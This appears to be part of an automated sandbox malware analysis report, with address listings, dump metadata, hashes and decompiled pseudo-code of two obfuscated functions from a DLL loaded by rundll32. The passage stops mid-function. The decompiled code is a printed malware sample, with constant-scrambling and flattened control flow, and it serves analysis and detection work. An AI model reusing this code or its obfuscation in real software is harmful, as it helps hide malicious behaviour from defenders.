                                                                        0x10006db1
                                                                        0x10006db6
                                                                        0x10006dbe
                                                                        0x10006dcc
                                                                        0x10006dd1
                                                                        0x10006dd7
                                                                        0x10006ddf
                                                                        0x10006de7
                                                                        0x10006dec
                                                                        0x10006df4
                                                                        0x10006dfc
                                                                        0x10006e04
                                                                        0x10006e09
                                                                        0x10006e0e
                                                                        0x10006e16
                                                                        0x10006e22
                                                                        0x10006e27
                                                                        0x10006e2d
                                                                        0x10006e35
                                                                        0x10006e3d
                                                                        0x10006e45
                                                                        0x10006e4a
                                                                        0x10006e52
                                                                        0x10006e5a
                                                                        0x10006e64
                                                                        0x10006e65
                                                                        0x10006e69
                                                                        0x10006e71
                                                                        0x10006e7f
                                                                        0x10006e88
                                                                        0x10006e8c
                                                                        0x10006e91
                                                                        0x10006e99
                                                                        0x10006e9d
                                                                        0x10006e9d
                                                                        0x10006ea1
                                                                        0x10006ea1
                                                                        0x10006ea1
                                                                        0x10006ea1
                                                                        0x10006ea7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10006ead
                                                                        0x10006fc6
                                                                        0x00000000
                                                                        0x10006fc6
                                                                        0x10006eb9
                                                                        0x10006fa3
                                                                        0x10006fb6
                                                                        0x10006fb9
                                                                        0x10006fba
                                                                        0x10006fbf
                                                                        0x00000000
                                                                        0x10006fbf
                                                                        0x10006ec5
                                                                        0x10006f5e
                                                                        0x10006f63
                                                                        0x10006f6a
                                                                        0x10006f72
                                                                        0x00000000
                                                                        0x10006f72
                                                                        0x10006ecd
                                                                        0x10006f29
                                                                        0x10006f2e
                                                                        0x10006f30
                                                                        0x10006f35
                                                                        0x10007044
                                                                        0x1000704a
                                                                        0x1000704a
                                                                        0x10006f3b
                                                                        0x00000000
                                                                        0x10006f3b
                                                                        0x10006ed5
                                                                        0x00000000
                                                                        0x10006edb
                                                                        0x10006ee0
                                                                        0x10006ee5
                                                                        0x10006eff
                                                                        0x10006f04
                                                                        0x10006f07
                                                                        0x10006f0d
                                                                        0x10006f0f
                                                                        0x10006f0f
                                                                        0x10006f0d
                                                                        0x00000000
                                                                        0x10006ee5
                                                                        0x10006ed5
                                                                        0x10006fd6
                                                                        0x10007017
                                                                        0x10007019
                                                                        0x00000000
                                                                        0x10007019
                                                                        0x10006fde
                                                                        0x1000703a
                                                                        0x00000000
                                                                        0x10007040
                                                                        0x10006fe6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10006ffc
                                                                        0x10007001
                                                                        0x10007004
                                                                        0x00000000
                                                                        0x1000701e
                                                                        0x1000701e
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: '$(]$-x3$-x3$1f$A$D4$Fd$ZQ$ap$bL$x
                                                                        • API String ID: 0-4015965578
                                                                        • Opcode ID: 865ac30736ce067385c778ebf4445e8f621965de7af294fe3d4e1e32b7b11566
                                                                        • Instruction ID: 7f07636c7d856d37613f0c6add9871aecd81a47647e8cfb522ba5c80404945ec
                                                                        • Opcode Fuzzy Hash: 865ac30736ce067385c778ebf4445e8f621965de7af294fe3d4e1e32b7b11566
                                                                        • Instruction Fuzzy Hash: 95C141729083419FE714CF25C88A40BBBE2FBC4798F20891DF599962A4D7B9D948CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001B3FE, Relevance: 14.0, Strings: 11, Instructions: 209COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E1001B3FE() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				unsigned int _v1136;
				void* _t216;
				void* _t229;
				intOrPtr _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				unsigned int* _t266;

				_t266 =  &_v1136;
				_v1052 = 0x59feef;
				_v1048 = 0x2a3fe0;
				_t229 = 0x3abfade2;
				_t258 = 0;
				_v1044 = 0;
				_v1096 = 0x3e7b;
				_v1096 = _v1096 << 8;
				_v1096 = _v1096 | 0x4b45bfac;
				_v1096 = _v1096 ^ 0x4b7f9484;
				_v1120 = 0xeeae;
				_v1120 = _v1120 + 0xffff949c;
				_v1120 = _v1120 + 0xffff26d2;
				_v1120 = _v1120 ^ 0xc3b4e966;
				_v1120 = _v1120 ^ 0x3c4b1d4d;
				_v1088 = 0x77a0;
				_v1088 = _v1088 | 0x40386f55;
				_v1088 = _v1088 << 0x10;
				_v1088 = _v1088 ^ 0x7ff5165c;
				_v1064 = 0xf0bf;
				_v1064 = _v1064 << 9;
				_v1064 = _v1064 ^ 0x01e162a5;
				_v1072 = 0x124d;
				_t259 = 0x72;
				_v1072 = _v1072 / _t259;
				_v1072 = _v1072 ^ 0x00002ee6;
				_v1128 = 0x5292;
				_v1128 = _v1128 << 8;
				_v1128 = _v1128 + 0xe9bf;
				_v1128 = _v1128 + 0x3238;
				_v1128 = _v1128 ^ 0x0053b92a;
				_v1136 = 0xc2f1;
				_v1136 = _v1136 + 0x6410;
				_v1136 = _v1136 >> 0xc;
				_v1136 = _v1136 + 0x63d1;
				_v1136 = _v1136 ^ 0x00000ac7;
				_v1112 = 0x7058;
				_t260 = 0x4b;
				_v1112 = _v1112 * 0xd;
				_v1112 = _v1112 << 6;
				_v1112 = _v1112 + 0x987c;
				_v1112 = _v1112 ^ 0x016df42c;
				_v1100 = 0x41a9;
				_v1100 = _v1100 + 0xffffec41;
				_v1100 = _v1100 + 0xffff9ba9;
				_v1100 = _v1100 ^ 0xffffd6d5;
				_v1104 = 0x872a;
				_v1104 = _v1104 / _t260;
				_v1104 = _v1104 >> 0x10;
				_v1104 = _v1104 ^ 0x0000287c;
				_v1080 = 0x8003;
				_v1080 = _v1080 | 0x7adfffb6;
				_v1080 = _v1080 ^ 0x7adf96d6;
				_v1084 = 0x5426;
				_v1084 = _v1084 + 0xe4e2;
				_v1084 = _v1084 ^ 0xc6a85055;
				_v1084 = _v1084 ^ 0xc6a96844;
				_v1092 = 0x916a;
				_v1092 = _v1092 >> 0x10;
				_v1092 = _v1092 | 0x14ea685d;
				_v1092 = _v1092 ^ 0x14ea6f72;
				_v1056 = 0x7cb0;
				_v1056 = _v1056 >> 7;
				_v1056 = _v1056 ^ 0x000061a1;
				_v1132 = 0x4cf9;
				_v1132 = _v1132 ^ 0x2fb41e14;
				_v1132 = _v1132 ^ 0xb509e885;
				_v1132 = _v1132 + 0x3858;
				_v1132 = _v1132 ^ 0x9abd8624;
				_v1124 = 0xb90b;
				_v1124 = _v1124 | 0x9d483c7c;
				_t261 = 0x31;
				_v1124 = _v1124 / _t261;
				_v1124 = _v1124 << 0x10;
				_v1124 = _v1124 ^ 0xbab966f1;
				_v1076 = 0x4837;
				_t262 = 0x28;
				_v1076 = _v1076 * 0x42;
				_v1076 = _v1076 ^ 0x39645d85;
				_v1076 = _v1076 ^ 0x3976b123;
				_v1060 = 0xa4fd;
				_v1060 = _v1060 / _t262;
				_v1060 = _v1060 ^ 0x00000d98;
				_v1068 = 0x96bf;
				_v1068 = _v1068 | 0xc49b968d;
				_v1068 = _v1068 ^ 0xc49bbea0;
				_v1108 = 0xf482;
				_v1108 = _v1108 + 0xffffa317;
				_v1108 = _v1108 | 0x011b1071;
				_v1108 = _v1108 << 2;
				_v1108 = _v1108 ^ 0x046e6bfd;
				_v1116 = 0x4fbc;
				_v1116 = _v1116 + 0xffff81fd;
				_v1116 = _v1116 + 0xffff31d8;
				_t263 = 5;
				_v1116 = _v1116 / _t263;
				_v1116 = _v1116 ^ 0x33332c42;
				do {
					while(_t229 != 0xe952e95) {
						if(_t229 == 0x1126b32b) {
							_push(0x10001000);
							_push(_v1128);
							E100163BF(E1001BF25(_v1064, _v1072, __eflags), __eflags, _v1112, _v1100,  &_v1040,  *0x100221b0, _v1104,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v1080);
							E1001C5F7(_v1084, _v1092, _v1056, _v1132, _t217);
							_t266 =  &(_t266[0xb]);
							_t229 = 0xe952e95;
							continue;
						} else {
							if(_t229 == 0x2ea5cfd6) {
								E10008C0C(_v1096, __eflags, _v1120, _v1088,  &_v520);
								_t266 =  &(_t266[3]);
								_t229 = 0x1126b32b;
								continue;
							} else {
								if(_t229 == 0x3423edaf) {
									E1001654F(_v1068, _v1108, _v1116,  &_v1040);
								} else {
									if(_t229 != 0x3abfade2) {
										goto L10;
									} else {
										_t229 = 0x2ea5cfd6;
										continue;
									}
								}
							}
						}
						L13:
						return _t258;
					}
					_t216 = E10013D7C( &_v1040, __eflags, _v1076, _v1060,  &_v520);
					_t266 =  &(_t266[3]);
					__eflags = _t216;
					_t258 =  !=  ? 1 : _t258;
					_t229 = 0x3423edaf;
					L10:
					__eflags = _t229 - 0x8af5a53;
				} while (__eflags != 0);
				goto L13;
			}






































                                                                        0x1001b3fe
                                                                        0x1001b404
                                                                        0x1001b40e
                                                                        0x1001b416
                                                                        0x1001b41f
                                                                        0x1001b421
                                                                        0x1001b425
                                                                        0x1001b42d
                                                                        0x1001b432
                                                                        0x1001b43a
                                                                        0x1001b442
                                                                        0x1001b44a
                                                                        0x1001b452
                                                                        0x1001b45a
                                                                        0x1001b462
                                                                        0x1001b46a
                                                                        0x1001b472
                                                                        0x1001b47a
                                                                        0x1001b47f
                                                                        0x1001b487
                                                                        0x1001b48f
                                                                        0x1001b494
                                                                        0x1001b49c
                                                                        0x1001b4aa
                                                                        0x1001b4af
                                                                        0x1001b4b5
                                                                        0x1001b4bd
                                                                        0x1001b4c5
                                                                        0x1001b4ca
                                                                        0x1001b4d2
                                                                        0x1001b4da
                                                                        0x1001b4e2
                                                                        0x1001b4ea
                                                                        0x1001b4f2
                                                                        0x1001b4f7
                                                                        0x1001b4ff
                                                                        0x1001b507
                                                                        0x1001b514
                                                                        0x1001b515
                                                                        0x1001b519
                                                                        0x1001b51e
                                                                        0x1001b526
                                                                        0x1001b52e
                                                                        0x1001b536
                                                                        0x1001b53e
                                                                        0x1001b546
                                                                        0x1001b54e
                                                                        0x1001b55c
                                                                        0x1001b560
                                                                        0x1001b565
                                                                        0x1001b56d
                                                                        0x1001b575
                                                                        0x1001b57d
                                                                        0x1001b585
                                                                        0x1001b58d
                                                                        0x1001b595
                                                                        0x1001b59d
                                                                        0x1001b5a5
                                                                        0x1001b5ad
                                                                        0x1001b5b2
                                                                        0x1001b5ba
                                                                        0x1001b5c2
                                                                        0x1001b5ca
                                                                        0x1001b5cf
                                                                        0x1001b5d7
                                                                        0x1001b5df
                                                                        0x1001b5e7
                                                                        0x1001b5ef
                                                                        0x1001b5f7
                                                                        0x1001b5ff
                                                                        0x1001b609
                                                                        0x1001b621
                                                                        0x1001b626
                                                                        0x1001b62c
                                                                        0x1001b631
                                                                        0x1001b639
                                                                        0x1001b646
                                                                        0x1001b649
                                                                        0x1001b64d
                                                                        0x1001b655
                                                                        0x1001b65d
                                                                        0x1001b66d
                                                                        0x1001b671
                                                                        0x1001b679
                                                                        0x1001b681
                                                                        0x1001b689
                                                                        0x1001b691
                                                                        0x1001b699
                                                                        0x1001b6a1
                                                                        0x1001b6a9
                                                                        0x1001b6ae
                                                                        0x1001b6b6
                                                                        0x1001b6be
                                                                        0x1001b6c6
                                                                        0x1001b6d2
                                                                        0x1001b6d5
                                                                        0x1001b6d9
                                                                        0x1001b6e1
                                                                        0x1001b6e1
                                                                        0x1001b6ef
                                                                        0x1001b731
                                                                        0x1001b736
                                                                        0x1001b77b
                                                                        0x1001b794
                                                                        0x1001b799
                                                                        0x1001b79c
                                                                        0x00000000
                                                                        0x1001b6f1
                                                                        0x1001b6f3
                                                                        0x1001b725
                                                                        0x1001b72a
                                                                        0x1001b72d
                                                                        0x00000000
                                                                        0x1001b6f5
                                                                        0x1001b6fb
                                                                        0x1001b7f2
                                                                        0x1001b701
                                                                        0x1001b707
                                                                        0x00000000
                                                                        0x1001b70d
                                                                        0x1001b70d
                                                                        0x00000000
                                                                        0x1001b70d
                                                                        0x1001b707
                                                                        0x1001b6fb
                                                                        0x1001b6f3
                                                                        0x1001b7f9
                                                                        0x1001b805
                                                                        0x1001b805
                                                                        0x1001b7be
                                                                        0x1001b7c5
                                                                        0x1001b7c9
                                                                        0x1001b7cb
                                                                        0x1001b7ce
                                                                        0x1001b7d3
                                                                        0x1001b7d3
                                                                        0x1001b7d3
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &T$7H$82$B,33$Uo8@$X8$Xp${>$|($.$?*
                                                                        • API String ID: 0-2199102758
                                                                        • Opcode ID: 78066439dbf68b0f30eec3b2653372f09639643f94e5358d5f4be4f09cd9386d
                                                                        • Instruction ID: 713d83d0593c4ddd124331638c6b3f8c97ab7d5c779b93df35cbcb4d530e2ad3
                                                                        • Opcode Fuzzy Hash: 78066439dbf68b0f30eec3b2653372f09639643f94e5358d5f4be4f09cd9386d
                                                                        • Instruction Fuzzy Hash: 69A1107150C3809FE398CF25D88985BBBE1FBC4358F504A1DF5969A2A0D7B5CA89CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10016B45, Relevance: 12.9, Strings: 10, Instructions: 362COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 99%
                                                                        			E10016B45() {
				void* _t369;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t374;
				signed int _t376;
				signed int _t378;
				signed int _t383;
				signed int _t389;
				void* _t395;
				signed int _t431;
				signed int _t432;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t442;
				void* _t446;

				 *((intOrPtr*)(_t446 + 0xa4)) = 0x772f9f;
				 *(_t446 + 0xac) = 0;
				 *(_t446 + 0xa8) = 0x789ddf;
				_t395 = 0x19391156;
				 *(_t446 + 0x6c) = 0xa1c8;
				 *(_t446 + 0x6c) =  *(_t446 + 0x6c) << 0xd;
				 *(_t446 + 0x6c) =  *(_t446 + 0x6c) ^ 0x14390001;
				 *(_t446 + 0xc) = 0xff4b;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) ^ 0x5146fe6d;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) ^ 0x6d1dcf2b;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) >> 5;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) ^ 0x01e2de71;
				 *(_t446 + 0x14) = 0x3f5c;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) | 0xe97d3723;
				 *(_t446 + 0xa0) = 0;
				_t22 = _t446 + 0x14; // 0xe97d3723
				 *(_t446 + 0x24) =  *_t22 * 0x76;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) >> 7;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) ^ 0x013f0ad7;
				 *(_t446 + 0x58) = 0x736e;
				 *(_t446 + 0x58) =  *(_t446 + 0x58) >> 1;
				_t435 = 0x7c;
				 *(_t446 + 0x5c) =  *(_t446 + 0x58) * 0x3a;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) ^ 0x000d12ba;
				 *(_t446 + 0xac) = 0xcefa;
				 *(_t446 + 0xac) =  *(_t446 + 0xac) | 0xd3773184;
				 *(_t446 + 0xac) =  *(_t446 + 0xac) ^ 0xd377a5bb;
				 *(_t446 + 0x14) = 0xdd96;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) + 0xffffff88;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) ^ 0x5290399f;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) << 0xd;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) ^ 0x1c901162;
				 *(_t446 + 0x74) = 0x655b;
				 *(_t446 + 0x74) =  *(_t446 + 0x74) | 0xcd9490d8;
				 *(_t446 + 0x74) =  *(_t446 + 0x74) ^ 0xcd94b23a;
				 *(_t446 + 0xa0) = 0x6c7f;
				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) ^ 0x13eba5b2;
				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) ^ 0x13ebbb7e;
				 *(_t446 + 0x94) = 0x7a54;
				 *(_t446 + 0x94) =  *(_t446 + 0x94) / _t435;
				 *(_t446 + 0x94) =  *(_t446 + 0x94) ^ 0x00007779;
				 *(_t446 + 0x4c) = 0xc640;
				 *(_t446 + 0x4c) =  *(_t446 + 0x4c) >> 5;
				 *(_t446 + 0x4c) =  *(_t446 + 0x4c) ^ 0x0a555cb4;
				 *(_t446 + 0x4c) =  *(_t446 + 0x4c) ^ 0x0a557f70;
				 *(_t446 + 0x38) = 0x22ba;
				_t436 = 0x67;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) / _t436;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) >> 5;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) + 0x267c;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0x00005dad;
				 *(_t446 + 0xb0) = 0x929;
				 *(_t446 + 0xb0) =  *(_t446 + 0xb0) + 0xffff6954;
				 *(_t446 + 0xb0) =  *(_t446 + 0xb0) ^ 0xffff7ae2;
				 *(_t446 + 0x18) = 0xce9e;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) + 0xffff0e6b;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) | 0x6011ff3c;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) << 0xc;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) ^ 0xfff39ad2;
				 *(_t446 + 0x70) = 0xb975;
				_t431 = 0x16;
				 *(_t446 + 0x6c) =  *(_t446 + 0x70) / _t431;
				 *(_t446 + 0x6c) =  *(_t446 + 0x6c) ^ 0x00003cc7;
				 *(_t446 + 0x64) = 0x8a7;
				_t437 = 0x17;
				 *(_t446 + 0x68) =  *(_t446 + 0x64) / _t437;
				 *(_t446 + 0x68) =  *(_t446 + 0x68) + 0x9f8;
				 *(_t446 + 0x68) =  *(_t446 + 0x68) ^ 0x00004bf2;
				 *(_t446 + 0xa8) = 0x9dab;
				 *(_t446 + 0xa8) =  *(_t446 + 0xa8) >> 3;
				 *(_t446 + 0xa8) =  *(_t446 + 0xa8) ^ 0x00004fe2;
				 *(_t446 + 0x8c) = 0xe61d;
				_t438 = 0x51;
				 *(_t446 + 0x8c) =  *(_t446 + 0x8c) * 0x24;
				 *(_t446 + 0x8c) =  *(_t446 + 0x8c) ^ 0x00200b54;
				 *(_t446 + 0x48) = 0x4300;
				 *(_t446 + 0x48) =  *(_t446 + 0x48) >> 0xb;
				 *(_t446 + 0x48) =  *(_t446 + 0x48) << 0xd;
				 *(_t446 + 0x48) =  *(_t446 + 0x48) ^ 0x00016849;
				 *(_t446 + 0x44) = 0x14fb;
				 *(_t446 + 0x44) =  *(_t446 + 0x44) >> 4;
				 *(_t446 + 0x44) =  *(_t446 + 0x44) >> 3;
				 *(_t446 + 0x44) =  *(_t446 + 0x44) ^ 0x000014fe;
				 *(_t446 + 0x64) = 0x908d;
				 *(_t446 + 0x64) =  *(_t446 + 0x64) + 0xda51;
				 *(_t446 + 0x64) =  *(_t446 + 0x64) ^ 0x6d67fea7;
				 *(_t446 + 0x64) =  *(_t446 + 0x64) ^ 0x6d669443;
				 *(_t446 + 0x24) = 0x5ccc;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) * 0x61;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) / _t438;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) ^ 0x12e038eb;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) ^ 0x12e0646f;
				 *(_t446 + 0x78) = 0x27f;
				 *(_t446 + 0x78) =  *(_t446 + 0x78) << 9;
				 *(_t446 + 0x78) =  *(_t446 + 0x78) ^ 0x0004fb39;
				 *(_t446 + 0x1c) = 0x6d1d;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) >> 9;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) + 0xb85e;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) ^ 0xaa7cb7d8;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) ^ 0xaa7c6457;
				 *(_t446 + 0x54) = 0x7318;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) >> 0xd;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) + 0xffff7495;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) ^ 0xffff5a53;
				 *(_t446 + 0x90) = 0xb397;
				 *(_t446 + 0x90) =  *(_t446 + 0x90) + 0x578a;
				 *(_t446 + 0x90) =  *(_t446 + 0x90) ^ 0x00016114;
				 *(_t446 + 0x34) = 0xd228;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) >> 4;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) ^ 0x6376bfe7;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) << 0xe;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) ^ 0xacb136be;
				 *(_t446 + 0x88) = 0x4cf0;
				 *(_t446 + 0x88) =  *(_t446 + 0x88) + 0xaecf;
				 *(_t446 + 0x88) =  *(_t446 + 0x88) ^ 0x0000fedc;
				 *(_t446 + 0x2c) = 0x629e;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) + 0xd78b;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) + 0x81bf;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) << 0xf;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) ^ 0xddf43aaf;
				 *(_t446 + 0x98) = 0xefe2;
				 *(_t446 + 0x98) =  *(_t446 + 0x98) << 4;
				 *(_t446 + 0x98) =  *(_t446 + 0x98) ^ 0x000efba1;
				 *(_t446 + 0x50) = 0xde18;
				 *(_t446 + 0x50) =  *(_t446 + 0x50) + 0x6327;
				 *(_t446 + 0x50) =  *(_t446 + 0x50) | 0xdc33595a;
				 *(_t446 + 0x50) =  *(_t446 + 0x50) ^ 0xdc335491;
				 *(_t446 + 0x7c) = 0xe244;
				 *(_t446 + 0x7c) =  *(_t446 + 0x7c) ^ 0x4f81d147;
				 *(_t446 + 0x7c) =  *(_t446 + 0x7c) ^ 0x4f817701;
				 *(_t446 + 0x9c) = 0xcfc5;
				_t439 = 0x13;
				_t444 =  *(_t446 + 0x68);
				 *(_t446 + 0x98) =  *(_t446 + 0x9c) / _t439;
				 *(_t446 + 0x98) =  *(_t446 + 0x98) ^ 0x00007994;
				 *(_t446 + 0xa0) = 0xdcf0;
				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) >> 5;
				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) ^ 0x00004aa7;
				 *(_t446 + 0x80) = 0xb565;
				 *(_t446 + 0x80) =  *(_t446 + 0x80) | 0xd87788ca;
				 *(_t446 + 0x80) =  *(_t446 + 0x80) ^ 0xd877c5fd;
				 *(_t446 + 0x38) = 0x6376;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0xd60ebee2;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) + 0xdd50;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0x3a07644d;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0xec08a801;
				 *(_t446 + 0x3c) = 0x1f0d;
				 *(_t446 + 0x3c) =  *(_t446 + 0x3c) | 0xe9d4bb8b;
				 *(_t446 + 0x3c) =  *(_t446 + 0x3c) ^ 0x531b6b57;
				 *(_t446 + 0x3c) =  *(_t446 + 0x3c) ^ 0xbacf9971;
				 *(_t446 + 0x5c) = 0x2ec0;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) << 0xc;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) >> 0xe;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) ^ 0x00004eb6;
				 *(_t446 + 0x54) = 0xc421;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) + 0x4f00;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) >> 0xa;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) ^ 0x0000676b;
				 *(_t446 + 0x2c) = 0x5f98;
				_t393 =  *(_t446 + 0x68);
				_t432 =  *(_t446 + 0x68);
				_t440 =  *(_t446 + 0x68);
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) / _t431;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) << 0xc;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) * 0x50;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) ^ 0x15b80003;
				while(1) {
					L1:
					_t369 = 0x667bbe4;
					L2:
					while(_t395 != 0x333430e) {
						if(_t395 == _t369) {
							_t372 = E10016409( *(_t446 + 0x70),  *(_t446 + 0x90),  *(_t446 + 0x4c), _t432, _t395, _t440, _t446 + 0xc4,  *(_t446 + 0x94), _t395,  *((intOrPtr*)(_t446 + 0x84)),  *(_t446 + 0x24), _t393, _t395,  *(_t446 + 0x50));
							_t446 = _t446 + 0x30;
							__eflags = _t372;
							if(_t372 == 0) {
								_t373 =  *(_t446 + 0xb0);
							} else {
								_t442 = _t432;
								while(1) {
									__eflags =  *((intOrPtr*)(_t442 + 4)) - 4;
									if( *((intOrPtr*)(_t442 + 4)) != 4) {
										goto L19;
									}
									L18:
									_t335 = _t442 + 0xc; // 0x4bfe
									_t378 = E1000D867(_t444,  *(_t446 + 0x98), _t335,  *(_t446 + 0x38),  *(_t446 + 0x88),  *((intOrPtr*)(_t446 + 0x28)));
									_t446 = _t446 + 0x10;
									__eflags = _t378;
									if(_t378 == 0) {
										_t373 = 1;
										 *(_t446 + 0xb0) = 1;
									} else {
										goto L19;
									}
									L24:
									_t440 =  *(_t446 + 0x68);
									goto L25;
									L19:
									_t376 =  *_t442;
									__eflags = _t376;
									if(_t376 == 0) {
										_t373 =  *(_t446 + 0xb0);
									} else {
										_t442 = _t442 + _t376;
										__eflags =  *((intOrPtr*)(_t442 + 4)) - 4;
										if( *((intOrPtr*)(_t442 + 4)) != 4) {
											goto L19;
										}
									}
									goto L24;
								}
							}
							L25:
							__eflags = _t373;
							if(__eflags == 0) {
								_t369 = 0x667bbe4;
								_t395 = 0x667bbe4;
								continue;
							} else {
								_t374 =  *0x10021404; // 0x0
								E10017309( *(_t446 + 0x94),  *(_t446 + 0x4c),  *_t374);
								_t395 = 0x3007dbb6;
								goto L1;
							}
							L31:
						} else {
							if(_t395 == 0x133ba569) {
								E10008C0C( *((intOrPtr*)(_t446 + 0x30)), __eflags,  *((intOrPtr*)(_t446 + 0x60)),  *(_t446 + 0xac), _t446 + 0xc4);
								_t383 = E10001E13( *((intOrPtr*)(_t446 + 0x28)),  *(_t446 + 0x88),  *(_t446 + 0xb0),  *(_t446 + 0xa0), _t446 + 0xd0);
								_t444 = _t383;
								_t446 = _t446 + 0x18;
								_t395 = 0x1f405b52;
								 *((short*)(_t383 - 2)) = 0;
								while(1) {
									L1:
									_t369 = 0x667bbe4;
									goto L2;
								}
							} else {
								if(_t395 == 0x1614145d) {
									_t440 = 0x1000;
									_push(_t395);
									 *(_t446 + 0x6c) = 0x1000;
									_t432 = E100157E8(0x1000);
									_t369 = 0x667bbe4;
									__eflags = _t432;
									_t395 =  !=  ? 0x667bbe4 : 0x333430e;
									continue;
								} else {
									if(_t395 == 0x19391156) {
										_t395 = 0x133ba569;
										continue;
									} else {
										if(_t395 == 0x1f405b52) {
											_t389 = E1000492A( *(_t446 + 0x5c),  *(_t446 + 0x4c) | 0x00000006,  *(_t446 + 0x74),  *(_t446 + 0x5c),  *((intOrPtr*)(_t446 + 0xd0)), _t395, 1,  *(_t446 + 0x2c), _t395, _t446 + 0xc8, 0x2000000,  *(_t446 + 0x74),  *(_t446 + 0x68),  *((intOrPtr*)(_t446 + 0xa4)));
											_t393 = _t389;
											_t446 = _t446 + 0x30;
											__eflags = _t389 - 0xffffffff;
											if(__eflags != 0) {
												_t395 = 0x1614145d;
												while(1) {
													L1:
													_t369 = 0x667bbe4;
													goto L2;
												}
											}
										} else {
											if(_t395 != 0x3007dbb6) {
												L29:
												__eflags = _t395 - 0x35dcba61;
												if(__eflags != 0) {
													continue;
												}
											} else {
												E100091CD( *((intOrPtr*)(_t446 + 0x84)),  *((intOrPtr*)(_t446 + 0xa4)),  *(_t446 + 0xa8), _t432,  *(_t446 + 0x80));
												_t446 = _t446 + 0xc;
												_t395 = 0x333430e;
